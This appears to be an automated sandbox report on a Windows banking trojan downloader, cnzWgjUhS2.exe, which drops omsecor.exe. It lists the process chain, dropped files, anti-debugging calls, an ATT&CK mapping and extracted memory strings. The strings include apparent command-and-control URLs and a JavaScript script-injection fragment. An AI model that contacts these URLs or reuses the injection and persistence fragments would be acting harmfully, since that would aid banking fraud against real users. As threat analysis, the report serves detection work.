          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.htmliZ#
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/179/569.htmloZ
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/59/409.html
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/59/409.html(&Z&
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/59/409.htmlk7
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.html
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.html$
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.html&
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.html(
          Source: omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.html;
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.htmlN
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000066E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.htmlP&
          Source: omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.htmlasuek.com5
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.htmlp
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/968/405.htmlz
          Source: cnzWgjUhS2.exe, 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, omsecor.exe, 00000001.00000002.1986846567.0000000000401000.00000040.00000001.01000000.00000004.sdmp, omsecor.exe, 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmp, omsecor.exe, 00000008.00000002.2986278876.0000000000401000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
          Source: omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://domaincntrol.com/?orighost=
          Source: omsecor.exe, 00000001.00000002.1986796301.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000001.00000002.1987110192.0000000000651000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879755700.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nojs.domaincntrol.com

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: Process Memory Space: cnzWgjUhS2.exe PID: 6600, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 6644, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 3868, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 564, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeFile created: C:\Windows\SysWOW64\merocz.xc6Jump to behavior
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_00401C410_2_00401C41
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040D2A40_2_0040D2A4
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040B51C0_2_0040B51C
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040CBD00_2_0040CBD0
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_00401C415_2_00401C41
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040D2A45_2_0040D2A4
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040B51C5_2_0040B51C
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040CBD05_2_0040CBD0
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: String function: 00405511 appears 56 times
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: String function: 00405493 appears 31 times
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 00405511 appears 56 times
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 00405493 appears 31 times
          Source: cnzWgjUhS2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/3@3/3
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeFile read: C:\Users\user\Desktop\cnzWgjUhS2.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\cnzWgjUhS2.exe "C:\Users\user\Desktop\cnzWgjUhS2.exe"
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
          Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
          Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomoveJump to behavior
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: cnzWgjUhS2.exeStatic PE information: section name: UPX2
          Source: omsecor.exe.0.drStatic PE information: section name: UPX2
          Source: omsecor.exe.1.drStatic PE information: section name: UPX2
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040D293 push ecx; ret 0_2_0040D2A3
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040CBB5 push ecx; ret 0_2_0040CBC8
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040D293 push ecx; ret 5_2_0040D2A3
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040CBB5 push ecx; ret 5_2_0040CBC8
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1
          Source: initial sampleStatic PE information: section name: UPX0
          Source: initial sampleStatic PE information: section name: UPX1

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\omsecor.exeExecutable created and started: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040350F RtlAllocateHeap,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileStringW,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_0040350F
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_004039EA RtlAllocateHeap,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileStringW,RtlAllocateHeap,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_004039EA
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040350F RtlAllocateHeap,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileStringW,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,5_2_0040350F
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_004039EA RtlAllocateHeap,RtlAllocateHeap,GetPrivateProfileStringW,GetPrivateProfileStringW,RtlAllocateHeap,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,5_2_004039EA
          Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 6636Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 2836Thread sleep time: -80000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040ABD9 FindFirstFileW,FindClose,5_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,5_2_00408248
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000066B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW Control\LRPC-559bf06f72796be679
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000066B000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2879968541.000000000062E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986475132.000000000059E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.2986475132.00000000005FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: omsecor.exe, 00000001.00000002.1987110192.000000000063B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
          Source: omsecor.exe, 00000005.00000002.2879968541.0000000000689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040D00B
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_004075D4 CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,FindCloseChangeNotification,CloseHandle,0_2_004075D4
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040D00B
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040D00B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040D00B
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004032B8
          Source: cnzWgjUhS2.exe, omsecor.exeBinary or memory string: Shell_TrayWnd
          Source: cnzWgjUhS2.exe, 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, omsecor.exe, 00000001.00000002.1986846567.0000000000401000.00000040.00000001.01000000.00000004.sdmp, omsecor.exe, 00000005.00000002.2879823052.0000000000401000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_0040CB03 cpuid 0_2_0040CB03
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv,0_2_00407267
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00407499
          Source: C:\Users\user\Desktop\cnzWgjUhS2.exeCode function: 0_2_00406CB5 GetVersionExW,0_2_00406CB5
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          2
          Process Injection
          121
          Masquerading
          OS Credential Dumping2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Virtualization/Sandbox Evasion
          LSASS Memory21
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Process Injection
          Security Account Manager1
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information
          NTDS1
          Process Discovery
          Distributed Component Object ModelInput Capture12
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
          Obfuscated Files or Information
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing
          Cached Domain Credentials13
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          cnzWgjUhS2.exe100%AviraTR/Downloader.Gen
          cnzWgjUhS2.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Windows\SysWOW64\omsecor.exe100%AviraTR/Downloader.Gen
          C:\Users\user\AppData\Roaming\omsecor.exe100%AviraTR/Downloader.Gen
          C:\Windows\SysWOW64\omsecor.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\omsecor.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://nojs.domaincntrol.com0%Avira URL Cloudsafe
          http://lousta.net/161/343.html100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/100/325.html)L100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.html100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.html;100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/100/325.html100%Avira URL Cloudphishing
          http://lousta.net/161/343.htmll100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/130/71.htmlcrosoft100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.htmlQZ100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.html3100%Avira URL Cloudphishing
          http://lousta.net/895/196.html#100%Avira URL Cloudphishing
          http://lousta.net/601/938.html100%Avira URL Cloudphishing
          http://lousta.net/347/423.htmlt?E&100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/y100%Avira URL Cloudphishing
          https://domaincntrol.com/?orighost=0%Avira URL Cloudsafe
          http://lousta.net/895/196.html100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.htmlz100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.htmlp100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/130/71.htmlr&&100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.htmliZ#100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.htmleZ100%Avira URL Cloudphishing
          http://lousta.net/303/619.html100%Avira URL Cloudphishing
          http://lousta.net/976/76.html100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.html(100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.html$100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.htmlP&100%Avira URL Cloudphishing
          http://lousta.net/303/619.html=100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.html&100%Avira URL Cloudphishing
          http://lousta.net/467/386.htmlQ=100%Avira URL Cloudphishing
          http://ow5dirasuek.com/59/409.htmlk7100%Avira URL Cloudphishing
          http://lousta.net/161/343.html=100%Avira URL Cloudphishing
          http://lousta.net/976/76.htmlmswsock.dll.mui100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.htmli100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/130/71.html100%Avira URL Cloudphishing
          http://lousta.net/347/423.html(100%Avira URL Cloudphishing
          http://ow5dirasuek.com/59/409.html100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/88/221.htmlV100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.htmlGU100%Avira URL Cloudphishing
          http://lousta.net/100%Avira URL Cloudphishing
          http://lousta.net/&X100%Avira URL Cloudphishing
          http://lousta.net/347/423.html100%Avira URL Cloudphishing
          http://lousta.net/895/196.html_100%Avira URL Cloudphishing
          http://lousta.net/303/619.htmlEc100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.html100%Avira URL Cloudphishing
          http://lousta.net/467/386.html100%Avira URL Cloudphishing
          http://lousta.net/161/343.htmle100%Avira URL Cloudphishing
          http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/100/325.html7100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.html;100%Avira URL Cloudphishing
          http://ow5dirasuek.com/179/569.htmloZ100%Avira URL Cloudphishing
          http://ow5dirasuek.com/59/409.html(&Z&100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.htmlasuek.com5100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/en-GB100%Avira URL Cloudphishing
          http://lousta.net/161/343.htmlT100%Avira URL Cloudphishing
          http://lousta.net/601/938.htmlshqos.dll.mui100%Avira URL Cloudphishing
          http://ow5dirasuek.com/100%Avira URL Cloudphishing
          http://mkkuei4kdsz.com/88/221.html100%Avira URL Cloudphishing
          http://ow5dirasuek.com/968/405.htmlN100%Avira URL Cloudphishing
